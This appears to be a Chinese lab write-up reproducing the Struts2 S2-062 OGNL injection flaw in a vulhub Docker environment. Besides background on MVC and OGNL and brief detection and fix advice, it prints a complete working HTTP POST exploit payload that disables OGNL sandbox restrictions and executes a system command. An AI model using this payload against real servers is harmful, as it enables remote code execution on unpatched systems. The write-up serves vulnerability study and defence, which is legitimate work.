CVE Struts2 s2-062 ONGL的漏洞复现

 什么是Struts2：

Struts2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它整合了Apache Struts和Opensymphony的Webwork的优点，旨在提供相对于Struts框架的增强和改进。Struts2框架鼓励开发者采用MVC（Model-View-Controller）架构，使得Web应用程序的结构更加清晰和灵活。

在MVC设计模式中，Struts2作为控制器（Controller）来建立模型（Model）与视图（View）之间的数据交互。它采用了拦截器的机制来处理用户的请求，使得业务逻辑控制器与Servlet

API完全脱离开。

Struts2还提供了一系列新的框架特性，包括从逻辑中分离出横切关注点的拦截器、减少或消除配置文件的需要、强大的表达式语言以及基于MVC模式的标签API等。这些特性使得Struts2框架在开发过程中更加灵活和方便。

然而，值得注意的是，Struts2在某些版本中存在远程代码执行漏洞，因此在使用Struts2进行开发时，需要确保使用最新的、已经修复漏洞的版本，并采取必要的安全措施来保护应用程序的安全性

MVC介绍：

MVC是一种软件设计典范，全名是Model-View-Controller，即模型-视图-控制器。它旨在用一种业务逻辑、数据、界面显示分离的方法组织代码，使得在改进和个性化定制界面及用户交互的同时，不需要重新编写业务逻辑

MVC可以分离页面展示代码和业务逻辑代码，提升可维护性、提

升开发效率

如果没有MVC组件：

1、为每个请求编写处理的Servlet

2、使用getParameter()获取请求参数

3、转换参数的数据类型，包括实体对象

4、处理重定向和转发URL

漏洞概况：

022年4月13日 恶意OGNL表达式，远程代码执行

漏洞影响版本 2.0.0  ，一下链接介绍了Struts2的漏洞记录

https://www.cnblogs.com/qiantan/p/10695567.html

复现：

  我们首先启动环境vulhub Docker

在漏洞目录下输入一下命令 docker-compose up

启动成功以后我们访问测试：

我们传入的参数是%25{6*6}   ，%25是被经过URL编码的，其实就是一个% ，我们打开源码看一下，执行了我们传入的参数

那么我们这个%{}解析OGNL表达式，对用户输入 的内容进行二次解析的时候，如果没有验证， 可能导致远程代码执行，他会自动计算结果，并把结果自动赋值给Struts的标签的地方，我们可以再试一下，我们将6*6改为 9*9

执行成功

我们接下来进一步测试

注意，这里端口是18080，地址改为自己本地地址，我修改过了，防止端口冲突

我们打开抓包工具BP，粘贴payload，执行成功，可以看出爆出了本机ID，导致了任意代码执行

payload：

POST /index.action HTTP/1.1
Host: 本机地址:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: JSESSIONID=node01c863u8lzu8eyn099a51bjyie0.node0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1191

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'id'}))
}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF—

爆出这个漏洞，我们可以执行反弹连接，这里不再演示

漏洞原理：

项目使用了%{}解析OGNL表达式，对用户输入 的内容进行二次解析的时候，如果没有验证， 可能导致远程代码执行

什么是OGNL

Object-Graph Navigation Language(对象 图导航语言)

 一种开源的 Java 表达式语言

 用于对数据进行访问，拥有类型转换、访问 对象方法、操作集合对象等功能

OGNL和Struts2

1、OGNL是Struts默认支持的表达式语言

2、OGNL可以取值赋值、访问类的静态方法和属性

3、访问OGNL上下文。Struts的上下文根对象： ValueStack

4、%{}用来把字符串转换成表达式 %25就是URL编码的%

5、可以在struts.xml和struts标签等地方使用OGNL 表达式

检测和修复：

暴破所有的参数，上送xxx=%25{6*6}，检测返 回值

恢复：

1.更新升级组件

2.流量特征检测拦截，将关键字过滤

3.购买安全产品